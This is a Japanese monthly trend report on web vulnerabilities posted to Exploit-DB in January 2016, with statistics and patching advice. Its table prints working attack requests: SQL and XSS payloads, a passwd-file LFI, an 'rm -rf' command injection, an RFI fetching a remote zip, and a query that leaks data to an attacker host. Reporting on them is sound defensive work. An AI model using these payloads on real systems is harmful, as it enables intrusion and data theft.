1. 脆弱性別件数
脆弱性カテゴリ 件数
ローカルファイル挿入
(Local File Inclusion:LFI) 1
コマンドインジェクション
(Command Injection) 1
コード・インジェクション
(Code Injection) 1
RFIリモートファイル挿入
(Remote File Inclusion:RFI) 2 クロス サイト スクリプティング
(Cross Site Scripting : XSS) 8 SQL インジェクション (SQL Injection) 15 合計 28 2. 危険度別件数 危険度 件数 割合 早急対応要 7 25% 高 21 75% 合計 28 100% 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 2 7% 中 4 14% 易 22 79% 合計 28 100% 4. 主なソフトウェア別脆弱性発生件数 件数 4 4 4 3 2 2 2 2 2 2 1 28 2016.01.01~2016.01.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 サマリー ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム ソフトウェア名 合計
2016年1月に公開されたExploit-DBの分析の結果、SQL Injection攻撃に対する脆弱性報告数が最も多かったです。分析されたSQL Injection攻撃は、攻撃難易度の側面では単なる攻撃の成功可否を問 うクエリーを使用して攻撃が行われる難易度の低い攻撃が大半でしたが、危険度の側面ではともに高い攻撃でした。該当脆弱性が発見されたソフトウェアを使用する管理者は対象モジュール及びプラグインに入力値 検証をさらに厳しくするセキュリティパッチおよびセキュアコーディングを行い、SQL Injection攻撃に露出されないよう注意しなければなりません。SQL Injectionの他、最近になってCode Injectionと関連した脆弱 性が周期的に現れています。PHP Code Injectionは、SQL InjectionとCommand Injectionに比べ、相対的に危険度が低い脆弱性に属しますが、相変わらず多くのWebサイトがPHPで構成されていて、 PHP当該サイトはCode Injectionに簡単に露出される可能性があります。PHP Code InjectionもSQL Injectionと同じく、ユーザの入力値を厳しく検証して、悪意的なコードが実行されないよう注意しなければ
なりません。 PHPIPAM SevOne mcart Ramui webblog SeaWell Networks Open Audit Wordpress BK Mobile CMS Advanced Electron Forum
ProjectSend Simple PHP Polling System
1 1 1 2 8 15 0 2 4 6 8 10 12 14 16
脆弱性別件数
7 21危険度別分類
早急対応要 高 2 4 22攻撃実行の難易度別件数
難 中 易 4 4 4 3 2 2 2 2 2 2 1主なソフトウェア別脆弱性発生件数
Open Audit ProjectSend Simple PHP Polling System Wordpress BK Mobile CMS Advanced Electron Forum PHPIPAM Ramui webblog SevOne mcart SeaWell Networks2016.01.01~2016.01.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 中:情報漏洩 するため、高度な攻撃コードを採用したパターン、知らされていない攻撃 コードを採用したパターンのいずれかに該当する ** 5件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 ソフトウェア名 既知の攻撃コードを採用したパターンのいずれかに該当する 中:攻撃手法自体は難しくないが、迂回コードを採用したパターン 早急対応要:攻撃が成功した場合システムへ侵入可 高:システム情報を取得するか、あるいはクライアントに2次被害を及ぼす 危険度分類基準 難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得 易:1回のリクエストで攻撃が成立するパターン、複数回トライするも、 攻撃実行難易度分類基準
日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2016-01-02 39150 SQL Injection 易 高
Open Audit
-software_add_license.php SQL Injection 脆弱性
/software_add_license.php?id=1%20and%201=1-- Open Audit Open Audit
2016-01-02 39150 SQL Injection 易 高
Open Audit -delete_system.php SQL Injection 脆弱性
/delete_system.php?pc=1%20and%201=1-- Open Audit Open Audit
2016-01-02 39150 SQL Injection 易 高
Open Audit
-list_viewdef_software_for_sys tem.php SQL Injection 脆弱性
/list_viewdef_software_for_system.php?pc=1%20and
%201=1-- Open Audit Open Audit
2015-01-02 39150 SQL Injection 易 高
Open Audit -system_export.php SQL Injection 脆弱性
/system_export.php?pc=1%20and%201=1-- Open Audit Open Audit
2016-01-05 39171 XSS 易 高 PHPIPAM 1.1.010
-loginCheck.php XSS 脆弱性
POST /phpipam/site/login/loginCheck.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 ipamusername=<script>alert("RXSS01")</script>&ip ampassword=XXX PHPIPAM PHPIPAM 1.1.010 2016-01-05 39171 XSS 易 高 PHPIPAM 1.1.010 -loginCheck.php XSS 脆弱性 POST /phpipam/site/login/loginCheck.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 ipamusername=<script>alert("RXSS01")</script>&ip ampassword=XXX PHPIPAM PHPIPAM 1.1.010 2016-01-05 39168 SQL Injection 易 高
Simple PHP Polling System -manage-profile.php SQL Injection 脆弱性
POST /manage-profile.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 email=1' and 1=1--Simple PHP Polling System Simple PHP Polling System 2016-01-05 39168 SQL Injection 易 高
Simple PHP Polling System -registeracc.php SQL Injection 脆弱性
POST /registeracc.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 email=tester%40wics.com' or updatexml(2,concat(0x7e,(version())),0) or' Simple PHP Polling System Simple PHP Polling System 2016-01-05 39168 XSS 易 高
Simple PHP Polling System -manage-profile.php XSS Injection 脆弱性
POST /manage-profile.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 firstname=WICS&lastname=wics&email=<script>alert (document.location)</script>&password=admin&Conf Simple PHP Polling System Simple PHP Polling System 2016-01-05 39168 XSS 易 高
Simple PHP Polling System -registeracc.php XSS Injection 脆弱性
POST /registeracc.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 firstname=WICS&lastname=wics&email=<script>alert (1);</script>&password=admin&ConfirmPassword=a Simple PHP Polling System Simple PHP Polling System 2016-01-08 39202 XSS 易 高
WP Symposium Pro Social Network Plugin 15.12 -wps_usermeta_shortcodes.ph p XSS 脆弱性
POST /wps_usermeta_shortcodes.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 wpspro_country="><script>alert("1")</script><" Wordpress WP Symposium Pro Social Network Plugin 15.12 2016.01.01~2016.01.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 2016.01.01~2016.01.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
2016-01-14 39234 Code Injection 易 高 SevOne NMS <= 5.3.6.0 -kill.php Code Injection 脆弱性
POST /doms/discoveryqueue/kill.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 pids[]=echo phpinfo(); SevOne SevOne NMS <=5.3.6.0 2016-01-14 39234 Command Injection 中 早急対応要 SevOne NMS <= 5.3.6.0 -kill.php Command Injection 脆 弱性
POST /doms/discoveryqueue/kill.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 pids[]=python /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5; rm -rf SevOne SevOne NMS <= 5.3.6.0 2016-01-15 39246 SQL Injection 難 早急対応要
mcart.xls Bitrix Module 6.5.2 -mcart_xls_import.php SQL Injection 脆弱性 /bitrix/admin/mcart_xls_import.php?del_prof_real=1& xls_profile=%27%20OR%201=(select%20load_file(C ONCAT(CHAR(92),CHAR(92),(select%20version()),CH AR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),C HAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46 ),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR( 102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CH AR(114))))+--+
mcart mcart.xls Bitrix Module 6.5.2
2016-01-15 39246 SQL Injection 難 早急対応要
mcart.xls Bitrix Module 6.5.2 -mcart_xls_import_step_2.php SQL Injection 脆弱性 /admin/mcart_xls_import_step_2.php?save_profile=Y &make_translit_code=Y&xls_iblock_id=0,0,0,0,0,0,0,0 ,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92), (select%20version()),CHAR(46),CHAR(97),CHAR(116) ,CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(1 01),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHA R(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111), CHAR(98),CHAR(97),CHAR(114))))%29+--+&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRo w=0&titleRow=0&firstColumn=0&highestColumn=0& XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code= 1&xls_iblock_section_id_new=0
mcart mcart.xls Bitrix Module 6.5.2
2016-01-18 39266 LFI 易 早急対応要
SeaWell Networks Spectrum -configure_manage.php LFI 脆 弱性 /configure_manage.php?action=download_config&file =../../../../../../../../../etc/passwd SeaWell Networks SeaWell Networks Spectrum
2016-01-18 39263 RFI 易 高 Advanced Electron Forum
1.0.9 - index.php RFI 脆弱性 POST
/index.php?act=admin&adact=skin&seadact=import HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 folderpath=../&importtype=2&weburl=http://hyp3rlin x.altervista.org/evil.zip&filepath=../&uploadtheme=&i mportskin=Import Advanced Electron Forum Advanced Electron Forum 1.0.9
2016-01-18 39262 XSS 易 高 Advanced Electron Forum
1.0.9 - index.php XSS 脆弱性 POST
/index.php?act=admin&adact=skin&seadact=import HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 fredirect="/><script>alert("XSS Advanced Electron Forum Advanced Electron Forum 1.0.9 2016-01-25 39309 SQL Injection 中 早急対応要
Wordpress Booking Calendar Contact Form Plugin <=1.1.23
/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_check_IPN_veri Wordpress Wordpress Booking Calendar
日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 2016.01.01~2016.01.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
2016-01-27 39342 XSS 易 高
WordPress Booking Calendar Contact Form <=1.1.24 -admin.php XSS 脆弱性 /wp-admin/admin.php?page=cpabc_appointments&ac=st& chs=UTF-8&ict=%22%3E%3Cimg+src%3Dx+onerror%3Dalert %281%29%3E&ics=%22%3E%3Cimg+src%3Dx+one rror%3Dalert%281%29%3E&scr=1 Wordpress WordPress Booking Calendar Contact Form <=1.1.24 2016-01-27 39339 SQL Injection 中 早急対応要 BK Mobile jQuery CMS 2.4 -gallery1.php SQL Injection 脆 弱性 /user/gallery1.php?g_name=1%27%20union%20all% 20select%201,2,3,group_concat%28version%28%29 %29,5--+ BK Mobile CMS BK Mobile jQuery CMS 2.4 2016-01-27 39339 XSS 易 高 BK Mobile jQuery CMS 2.4 -gallery1.php XSS 脆弱性 /user/gallery1.php?g_name=%3Cscript%3Ealert%28 %22XSS%22%29%3C/script%3E BK Mobile CMS BK Mobile jQuery CMS 2.4 2016-01-28 39355 RFI 易 高
Ramui Web Hosting Directory Script 4.0 - connection.php RFI 脆弱性 /gb/include/connection.php?root=http://test.com.inde x.php Ramui webblog Ramui Web Hosting Directory Script 4.0
2016-01-28 39354 SQL Injection 易 高 Ramui Forum Script 9.0
-page.php SQL Injection 脆弱性
/gb/include/page.php?pagename=1%20and%201=1-- Ramui webblog
Ramui Forum Script 9.0
2016-01-29 39385 SQL Injection 中 早急対応要 ProjectSend r582 -
manage-files.php SQL Injection 脆弱性
POST /manage-files.php?client_id=1 HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
status=10' and 0 union select 0,1 ,'0) or 1 union select
ProjectSend ProjectSend r582
2016-01-29 39385 SQL Injection 易 高 ProjectSend r582 - clients.php
SQL Injection 脆弱性
POST /clients.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 status=1' and 1=1--ProjectSend ProjectSend r582 2016-01-29 39385 SQL Injection 易 高 ProjectSend r582 - rocess-zip-download.php SQL Injection 脆弱性 /rocess-zip-download.php?file=1%27%20and%201=1--%20 ProjectSend ProjectSend r582
2016-01-29 39385 SQL Injection 易 高 ProjectSend r582 -
home-log.php SQL Injection 脆弱性 /home-log.php?action=1%27%20and%201=1--%20 ProjectSend
ProjectSend r582